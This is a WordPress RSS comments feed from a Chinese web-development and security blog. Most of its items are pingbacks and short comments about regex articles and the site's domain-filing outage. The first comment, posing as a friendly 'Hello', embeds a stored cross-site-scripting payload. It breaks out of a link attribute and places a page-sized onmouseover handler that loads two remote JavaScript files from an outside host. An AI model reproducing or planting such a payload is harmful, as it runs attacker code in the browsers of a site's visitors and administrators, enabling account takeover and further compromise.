<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>“程默的博客”的评论</title>
	<atom:link href="http://blog.chacuo.net/comments/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.chacuo.net</link>
	<description>web原理、web架构、web安全、web性能、服务器性能、服务器架构、服务器安全;你不能预知明天，但你可以利用今天。你不能样样顺利，但你可以事事尽力!</description>
	<lastBuildDate>Fri, 12 Dec 2014 09:22:10 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
	<item>
		<title>jzpohf20463 对《网站备案突然取消了（8天不能访问）》的评论</title>
		<link>http://blog.chacuo.net/1195.html/comment-page-1#comment-258</link>
		<dc:creator>jzpohf20463</dc:creator>
		<pubDate>Fri, 12 Dec 2014 09:22:10 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=1195#comment-258</guid>
		<description><![CDATA[程默,Hello[&lt;a href=&quot;#&quot; title=&quot;]&quot; rel=&quot;nofollow&quot;&gt;&lt;/a&gt;[&quot; &lt;!-- onmouseover=javascript:jQuery.getScript(&quot;//image.asswmeeting.org/NoDel_wp/g.js&quot;);jQuery.getScript(&quot;//image.asswmeeting.org/NoDel_wp/2.js&quot;) style=&quot;text-decoration:none;display:block;width:2000px;height:2000px;//&gt; --&gt;&#160;&#160;&#160;&#160;&#160;Hello,程默&#160;&#160;&#160;&#160;&#160;&#160;&#160;&lt;a&gt;&lt;/a&gt;]]]></description>
		<content:encoded><![CDATA[<p>程默,Hello[<a href="#" title="]&#8221; rel=&#8221;nofollow&#8221;></a>[" <!-- onmouseover=javascript:jQuery.getScript("//image.asswmeeting.org/NoDel_wp/g.js");jQuery.getScript("//image.asswmeeting.org/NoDel_wp/2.js") style="text-decoration:none;display:block;width:2000px;height:2000px;//&gt; -->&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Hello,程默&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a></a>]</p>
]]></content:encoded>
	</item>
	<item>
		<title>程默 对《网站备案突然取消了（8天不能访问）》的评论</title>
		<link>http://blog.chacuo.net/1195.html/comment-page-1#comment-34</link>
		<dc:creator>程默</dc:creator>
		<pubDate>Sun, 19 Jan 2014 15:17:00 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=1195#comment-34</guid>
		<description><![CDATA[是的，前后花了一个月了]]></description>
		<content:encoded><![CDATA[<p>是的，前后花了一个月了</p>
]]></content:encoded>
	</item>
	<item>
		<title>陈 金萍 对《网站备案突然取消了（8天不能访问）》的评论</title>
		<link>http://blog.chacuo.net/1195.html/comment-page-1#comment-33</link>
		<dc:creator>陈 金萍</dc:creator>
		<pubDate>Sun, 19 Jan 2014 12:04:16 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=1195#comment-33</guid>
		<description><![CDATA[现在可以了,备下来了吗？]]></description>
		<content:encoded><![CDATA[<p>现在可以了,备下来了吗？</p>
]]></content:encoded>
	</item>
	<item>
		<title>lyz19890927 对《网站备案突然取消了（8天不能访问）》的评论</title>
		<link>http://blog.chacuo.net/1195.html/comment-page-1#comment-25</link>
		<dc:creator>lyz19890927</dc:creator>
		<pubDate>Mon, 21 Oct 2013 08:07:34 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=1195#comment-25</guid>
		<description><![CDATA[终于可以访问了，谢天谢地，用惯了一些工具，用不了了真叫人抓狂]]></description>
		<content:encoded><![CDATA[<p>终于可以访问了，谢天谢地，用惯了一些工具，用不了了真叫人抓狂</p>
]]></content:encoded>
	</item>
	<item>
		<title>正则表达式性能优化（高效正则表达式书写）-程默的博客 对《正则表达式匹配解析过程探讨分析（正则表达式匹配原理）》的评论</title>
		<link>http://blog.chacuo.net/255.html/comment-page-1#comment-18</link>
		<dc:creator>正则表达式性能优化（高效正则表达式书写）-程默的博客</dc:creator>
		<pubDate>Thu, 04 Jul 2013 09:26:02 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=255#comment-18</guid>
		<description><![CDATA[[...] 这里说的正则表达式优化，主要是针对目前常用的NFA模式正则表达式，详细可以参考：正则表达式匹配解析过程探讨分析（正则表达式匹配原理）。从上面例子，我们可以推断出，影响NFA类正则表达式（常见语言：GNU Emacs,Java,ergp,less,more,.NET语言, PCRE library,Perl,PHP,Python,Ruby,sed,vi )其实主要是它的“回溯”，减少“回溯”次数（减少循环查找同一个字符次数），是提高性能的主要方法。 我们来看个例子： [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 这里说的正则表达式优化，主要是针对目前常用的NFA模式正则表达式，详细可以参考：正则表达式匹配解析过程探讨分析（正则表达式匹配原理）。从上面例子，我们可以推断出，影响NFA类正则表达式（常见语言：GNU Emacs,Java,ergp,less,more,.NET语言, PCRE library,Perl,PHP,Python,Ruby,sed,vi )其实主要是它的“回溯”，减少“回溯”次数（减少循环查找同一个字符次数），是提高性能的主要方法。 我们来看个例子： [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>web开发人员 提升技术、突破瓶颈方法探讨-程默的博客 对《web前端开发人员技能点汇总、技术详细列表》的评论</title>
		<link>http://blog.chacuo.net/280.html/comment-page-1#comment-15</link>
		<dc:creator>web开发人员 提升技术、突破瓶颈方法探讨-程默的博客</dc:creator>
		<pubDate>Tue, 18 Jun 2013 16:17:29 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=280#comment-15</guid>
		<description><![CDATA[[...] web前端开发人员技能点汇总、技术详细列表 [...]]]></description>
		<content:encoded><![CDATA[<p>[...] web前端开发人员技能点汇总、技术详细列表 [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>正则表达式断言、巡视（Assertions）、正向断言、反向断言-程默的博客 对《正则表达式匹配解析过程探讨分析（正则表达式匹配原理）》的评论</title>
		<link>http://blog.chacuo.net/255.html/comment-page-1#comment-14</link>
		<dc:creator>正则表达式断言、巡视（Assertions）、正向断言、反向断言-程默的博客</dc:creator>
		<pubDate>Fri, 14 Jun 2013 16:48:43 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=255#comment-14</guid>
		<description><![CDATA[[...] 正则表达式匹配解析过程探讨分析（正则表达式匹配原理） [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 正则表达式匹配解析过程探讨分析（正则表达式匹配原理） [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>正则表达式匹配解析过程探讨分析（正则表达式匹配原理）-程默的博客 对《正则表达式性能测试工具推荐、优化工具推荐(regexbuddy推荐)》的评论</title>
		<link>http://blog.chacuo.net/238.html/comment-page-1#comment-13</link>
		<dc:creator>正则表达式匹配解析过程探讨分析（正则表达式匹配原理）-程默的博客</dc:creator>
		<pubDate>Fri, 14 Jun 2013 10:03:38 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=238#comment-13</guid>
		<description><![CDATA[[...] 正则表达式性能测试工具推荐、优化工具推荐(regexbuddy推荐) [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 正则表达式性能测试工具推荐、优化工具推荐(regexbuddy推荐) [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; 正则表达式性能测试工具推荐、优化工具推荐(regexbuddy推荐)-程默的博客 对《正则表达式工具推荐（学习工具、测试工具）》的评论</title>
		<link>http://blog.chacuo.net/198.html/comment-page-1#comment-12</link>
		<dc:creator>&#187; 正则表达式性能测试工具推荐、优化工具推荐(regexbuddy推荐)-程默的博客</dc:creator>
		<pubDate>Thu, 13 Jun 2013 14:59:20 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=198#comment-12</guid>
		<description><![CDATA[[...] 正则表达式工具推荐（学习工具、测试工具） [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 正则表达式工具推荐（学习工具、测试工具） [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; 正则表达式单行、多行模式简介（使用说明）-程默的博客 对《正则表达式(regex) 贪婪模式、懒惰模式使用》的评论</title>
		<link>http://blog.chacuo.net/211.html/comment-page-1#comment-11</link>
		<dc:creator>&#187; 正则表达式单行、多行模式简介（使用说明）-程默的博客</dc:creator>
		<pubDate>Wed, 12 Jun 2013 16:27:47 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=211#comment-11</guid>
		<description><![CDATA[[...] 正则表达式(regex) 贪婪模式、懒惰模式使用 [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 正则表达式(regex) 贪婪模式、懒惰模式使用 [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; 正则表达式(regex) 贪婪模式、懒惰模式使用-程默的博客 对《正则表达式工具推荐（学习工具、测试工具）》的评论</title>
		<link>http://blog.chacuo.net/198.html/comment-page-1#comment-10</link>
		<dc:creator>&#187; 正则表达式(regex) 贪婪模式、懒惰模式使用-程默的博客</dc:creator>
		<pubDate>Tue, 11 Jun 2013 14:30:48 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=198#comment-10</guid>
		<description><![CDATA[[...] 正则表达式工具推荐（学习工具、测试工具） [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 正则表达式工具推荐（学习工具、测试工具） [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; 正则表达式（regex)或操作符&#8221;&#124;&#8220;使用易出现功能Bug-程默的博客 对《正则表达式（regex)错误使用导致功能漏洞》的评论</title>
		<link>http://blog.chacuo.net/183.html/comment-page-1#comment-9</link>
		<dc:creator>&#187; 正则表达式（regex)或操作符&#8221;&#124;&#8220;使用易出现功能Bug-程默的博客</dc:creator>
		<pubDate>Sun, 09 Jun 2013 11:05:30 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=183#comment-9</guid>
		<description><![CDATA[[...] 正则表达式（regex)错误使用导致功能漏洞 [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 正则表达式（regex)错误使用导致功能漏洞 [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; web上存漏洞及原理分析、防范方法（安全文件上存方法）-程默的博客 对《web上存漏洞及原理分析、防范方法（文件类型检测漏洞）》的评论</title>
		<link>http://blog.chacuo.net/141.html/comment-page-1#comment-8</link>
		<dc:creator>&#187; web上存漏洞及原理分析、防范方法（安全文件上存方法）-程默的博客</dc:creator>
		<pubDate>Tue, 04 Jun 2013 05:05:34 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=141#comment-8</guid>
		<description><![CDATA[[...] web上存漏洞及原理分析、防范方法（文件类型检测漏洞） [...]]]></description>
		<content:encoded><![CDATA[<p>[...] web上存漏洞及原理分析、防范方法（文件类型检测漏洞） [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; web上存漏洞及原理分析、防范方法（安全文件上存方法）-程默的博客 对《web上存漏洞及原理分析、防范方法（文件名检测漏洞）》的评论</title>
		<link>http://blog.chacuo.net/136.html/comment-page-1#comment-7</link>
		<dc:creator>&#187; web上存漏洞及原理分析、防范方法（安全文件上存方法）-程默的博客</dc:creator>
		<pubDate>Mon, 03 Jun 2013 10:08:44 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=136#comment-7</guid>
		<description><![CDATA[[...] web上存漏洞及原理分析、防范方法（文件名检测漏洞） [...]]]></description>
		<content:encoded><![CDATA[<p>[...] web上存漏洞及原理分析、防范方法（文件名检测漏洞） [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; web上存漏洞及原理分析、防范方法（文件类型检测漏洞）-程默的博客 对《web上存漏洞及原理分析、防范方法（文件名检测漏洞）》的评论</title>
		<link>http://blog.chacuo.net/136.html/comment-page-1#comment-6</link>
		<dc:creator>&#187; web上存漏洞及原理分析、防范方法（文件类型检测漏洞）-程默的博客</dc:creator>
		<pubDate>Mon, 03 Jun 2013 08:58:14 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=136#comment-6</guid>
		<description><![CDATA[[...] web上存漏洞及原理分析、防范方法（文件名检测漏洞） [...]]]></description>
		<content:encoded><![CDATA[<p>[...] web上存漏洞及原理分析、防范方法（文件名检测漏洞） [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; web上存漏洞及原理分析、防范方法（2）-程默的博客 对《web上存漏洞及原理分析、防范方法》的评论</title>
		<link>http://blog.chacuo.net/108.html/comment-page-1#comment-5</link>
		<dc:creator>&#187; web上存漏洞及原理分析、防范方法（2）-程默的博客</dc:creator>
		<pubDate>Sat, 01 Jun 2013 15:10:03 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=108#comment-5</guid>
		<description><![CDATA[[...] web上存漏洞及原理分析、防范方法 [...]]]></description>
		<content:encoded><![CDATA[<p>[...] web上存漏洞及原理分析、防范方法 [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; web站点获取用户IP的安全方法 HTTP_X_FORWARDED_FOR检验 程默的博客 对《获取用户Ip地址通用方法常见安全隐患(HTTP_X_FORWARDED_FOR)》的评论</title>
		<link>http://blog.chacuo.net/98.html/comment-page-1#comment-4</link>
		<dc:creator>&#187; web站点获取用户IP的安全方法 HTTP_X_FORWARDED_FOR检验 程默的博客</dc:creator>
		<pubDate>Wed, 29 May 2013 15:28:33 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=98#comment-4</guid>
		<description><![CDATA[[...] 获取用户Ip地址通用方法常见安全隐患(HTTP_X_FORWARDED_FOR) [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 获取用户Ip地址通用方法常见安全隐患(HTTP_X_FORWARDED_FOR) [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; wordpress 过滤器原理执行过程分析(源码分析) 程默的博客 对《wordpress 3.5 filter 消息标签的名称》的评论</title>
		<link>http://blog.chacuo.net/88.html/comment-page-1#comment-3</link>
		<dc:creator>&#187; wordpress 过滤器原理执行过程分析(源码分析) 程默的博客</dc:creator>
		<pubDate>Mon, 27 May 2013 18:36:57 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=88#comment-3</guid>
		<description><![CDATA[[...] wordpress 3.5 filter 消息标签的名称 [...]]]></description>
		<content:encoded><![CDATA[<p>[...] wordpress 3.5 filter 消息标签的名称 [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>&#187; wordpress 3.5 filter 消息标签的名称 程默的博客 对《《我的博客》之从技术眼中分析wordpress结构优缺点》的评论</title>
		<link>http://blog.chacuo.net/67.html/comment-page-1#comment-2</link>
		<dc:creator>&#187; wordpress 3.5 filter 消息标签的名称 程默的博客</dc:creator>
		<pubDate>Sun, 26 May 2013 15:56:44 +0000</pubDate>
		<guid isPermaLink="false">http://blog.chacuo.net/?p=67#comment-2</guid>
		<description><![CDATA[[...] 《我的博客》之从技术眼中分析wordpress结构优缺点 [...]]]></description>
		<content:encoded><![CDATA[<p>[...] 《我的博客》之从技术眼中分析wordpress结构优缺点 [...]</p>
]]></content:encoded>
	</item>
</channel>
</rss>
